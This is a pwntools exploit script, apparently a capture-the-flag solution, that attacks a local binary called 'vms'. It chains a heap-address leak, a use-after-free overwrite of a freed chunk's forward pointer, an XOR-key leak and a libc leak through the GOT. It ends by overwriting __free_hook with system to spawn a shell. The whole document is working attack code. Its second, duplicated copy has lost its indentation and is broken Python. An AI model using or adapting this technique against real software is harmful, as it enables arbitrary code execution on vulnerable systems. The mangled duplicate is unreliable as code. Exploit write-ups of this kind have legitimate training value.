Q2h1Cg/vms_exp.py

## vms_exp.py
from pwn import *


# context.log_level = "DEBUG"
libc = ELF("/lib/x86_64-linux-gnu/libc-2.21.so")
vms = ELF("./vms")
io = process("./vms")


def register(username, age):
    log.info("register: {} - {}".format(username, age))
    io.recvuntil("> ")
    io.send("1")
    io.recvuntil("bytes): ")
    io.sendline(username)
    io.recvuntil("(1-100)")
    io.send(str(age))


def add_vuln_info(title, detail_length, detail, rank):
    log.info("add vuln: {} - {} - {} - {}".format(title, detail_length, detail, rank))
    io.recvuntil("> ")
    io.send("2")
    io.recvuntil("bytes): ")
    io.send(title if len(title) == 64 else title+"\n")
    io.recvuntil("length(1-4096): ")
    io.send(str(detail_length))
    io.recvuntil("bytes): ")
    if detail_length == len(detail):
        io.send(detail)
    else:
        io.sendline(detail)
    io.recvuntil("(0-99999999999): ")
    io.send(str(rank))


def edit_vuln_info(title, rank, detail):
    log.info("edit vuln: {} - {} - {}".format(title, rank, detail))
    io.recvuntil("> ")
    io.send("3")
    io.recvuntil("vuln title: ")
    io.send(title if len(title) == 64 else title+"\n")
    io.recvuntil("(0-99999999999): ")
    io.send(str(rank))
    io.recvuntil("bytes): ")
    io.sendline(detail)


def delete_vuln_info(title):
    log.info("delete vuln: {}".format(title))
    io.recvuntil("> ")
    io.send("4")
    io.recvuntil("vuln title: ")
    io.send(title if len(title) == 64 else title+"\n")


def show_all_vulns():
    log.info("show all vulns")
    io.recvuntil("> ")
    io.send("5")


# register
register("chu", 1)


# leak heap addr
for i in range(2):
    title = "title{}".format(i)
    detail = "detail{}".format(i)
    add_vuln_info(title, 200, detail, 0)
for i in reversed(range(2)):
    title = "title{}".format(i)
    delete_vuln_info(title)
add_vuln_info("title2", 200, "detail2", 0)
show_all_vulns()
io.recvuntil("vuln rank: ")
HEAP_BASE = int(io.recvline().strip()) - 0x150
delete_vuln_info("title2")
log.success("base of heap => {}".format(hex(HEAP_BASE)))


# overwrite flink by UAF
add_vuln_info("A"*48 + p64(0) + p64(0x71), 200, "detail0", 0)
add_vuln_info("title1", 200, "detail1", 0)
delete_vuln_info("A"*48 + p64(0) + p64(0x71))
edit_vuln_info("A"*48 + p64(0) + p64(0x71), HEAP_BASE+0x58, "detail0")


# malloc to vuln2's detail
add_vuln_info("title2", 200, "detail2", 0)
add_vuln_info("title3", 200, "detail3", 0)


# leak xor key
show_all_vulns()
io.recvuntil("detail3")
io.recvuntil("rank: ")
encrypted_detail_addr = int(io.recvline().strip())
if encrypted_detail_addr < 0:
    encrypted_detail_addr += 0xffffffffffffffff + 1
ENCRYPT_KEY = encrypted_detail_addr ^ (HEAP_BASE + 0x80)
log.success("encrypt_key => {}".format(hex(ENCRYPT_KEY)))


# set global limit to bypass check
edit_vuln_info("title3", ENCRYPT_KEY ^ 0x603010, "detail3")
edit_vuln_info("title2", 0, p64(9223372036854775807))


# leak libc
edit_vuln_info("title3", ENCRYPT_KEY ^ vms.got.get("atol"), "detail3")
show_all_vulns()
io.recvuntil("title2")
io.recvuntil("detail: ")
libc.address = u64(io.recv(6) + "\x00\x00") - libc.symbols.get("atol")
log.success("libc base => {}".format(hex(libc.address)))
log.success("system => {}".format(hex(libc.symbols.get("system"))))


# use __free_hook bypass RELRO
edit_vuln_info("title3",  ENCRYPT_KEY ^ libc.symbols.get("__free_hook"), "/bin/sh")
edit_vuln_info("title2", 0, p64(libc.symbols.get("system")))
delete_vuln_info("title3")


# spawn
io.interactive()
	from pwn import *


	# context.log_level = "DEBUG"
	libc = ELF("/lib/x86_64-linux-gnu/libc-2.21.so")
	vms = ELF("./vms")
	io = process("./vms")


	def register(username, age):
	log.info("register: {} - {}".format(username, age))
	io.recvuntil("> ")
	io.send("1")
	io.recvuntil("bytes): ")
	io.sendline(username)
	io.recvuntil("(1-100)")
	io.send(str(age))


	def add_vuln_info(title, detail_length, detail, rank):
	log.info("add vuln: {} - {} - {} - {}".format(title, detail_length, detail, rank))
	io.recvuntil("> ")
	io.send("2")
	io.recvuntil("bytes): ")
	io.send(title if len(title) == 64 else title+"\n")
	io.recvuntil("length(1-4096): ")
	io.send(str(detail_length))
	io.recvuntil("bytes): ")
	if detail_length == len(detail):
	io.send(detail)
	else:
	io.sendline(detail)
	io.recvuntil("(0-99999999999): ")
	io.send(str(rank))


	def edit_vuln_info(title, rank, detail):
	log.info("edit vuln: {} - {} - {}".format(title, rank, detail))
	io.recvuntil("> ")
	io.send("3")
	io.recvuntil("vuln title: ")
	io.send(title if len(title) == 64 else title+"\n")
	io.recvuntil("(0-99999999999): ")
	io.send(str(rank))
	io.recvuntil("bytes): ")
	io.sendline(detail)


	def delete_vuln_info(title):
	log.info("delete vuln: {}".format(title))
	io.recvuntil("> ")
	io.send("4")
	io.recvuntil("vuln title: ")
	io.send(title if len(title) == 64 else title+"\n")


	def show_all_vulns():
	log.info("show all vulns")
	io.recvuntil("> ")
	io.send("5")


	# register
	register("chu", 1)


	# leak heap addr
	for i in range(2):
	title = "title{}".format(i)
	detail = "detail{}".format(i)
	add_vuln_info(title, 200, detail, 0)
	for i in reversed(range(2)):
	title = "title{}".format(i)
	delete_vuln_info(title)
	add_vuln_info("title2", 200, "detail2", 0)
	show_all_vulns()
	io.recvuntil("vuln rank: ")
	HEAP_BASE = int(io.recvline().strip()) - 0x150
	delete_vuln_info("title2")
	log.success("base of heap => {}".format(hex(HEAP_BASE)))


	# overwrite flink by UAF
	add_vuln_info("A"*48 + p64(0) + p64(0x71), 200, "detail0", 0)
	add_vuln_info("title1", 200, "detail1", 0)
	delete_vuln_info("A"*48 + p64(0) + p64(0x71))
	edit_vuln_info("A"*48 + p64(0) + p64(0x71), HEAP_BASE+0x58, "detail0")


	# malloc to vuln2's detail
	add_vuln_info("title2", 200, "detail2", 0)
	add_vuln_info("title3", 200, "detail3", 0)


	# leak xor key
	show_all_vulns()
	io.recvuntil("detail3")
	io.recvuntil("rank: ")
	encrypted_detail_addr = int(io.recvline().strip())
	if encrypted_detail_addr < 0:
	encrypted_detail_addr += 0xffffffffffffffff + 1
	ENCRYPT_KEY = encrypted_detail_addr ^ (HEAP_BASE + 0x80)
	log.success("encrypt_key => {}".format(hex(ENCRYPT_KEY)))


	# set global limit to bypass check
	edit_vuln_info("title3", ENCRYPT_KEY ^ 0x603010, "detail3")
	edit_vuln_info("title2", 0, p64(9223372036854775807))


	# leak libc
	edit_vuln_info("title3", ENCRYPT_KEY ^ vms.got.get("atol"), "detail3")
	show_all_vulns()
	io.recvuntil("title2")
	io.recvuntil("detail: ")
	libc.address = u64(io.recv(6) + "\x00\x00") - libc.symbols.get("atol")
	log.success("libc base => {}".format(hex(libc.address)))
	log.success("system => {}".format(hex(libc.symbols.get("system"))))


	# use __free_hook bypass RELRO
	edit_vuln_info("title3", ENCRYPT_KEY ^ libc.symbols.get("__free_hook"), "/bin/sh")
	edit_vuln_info("title2", 0, p64(libc.symbols.get("system")))
	delete_vuln_info("title3")


	# spawn
	io.interactive()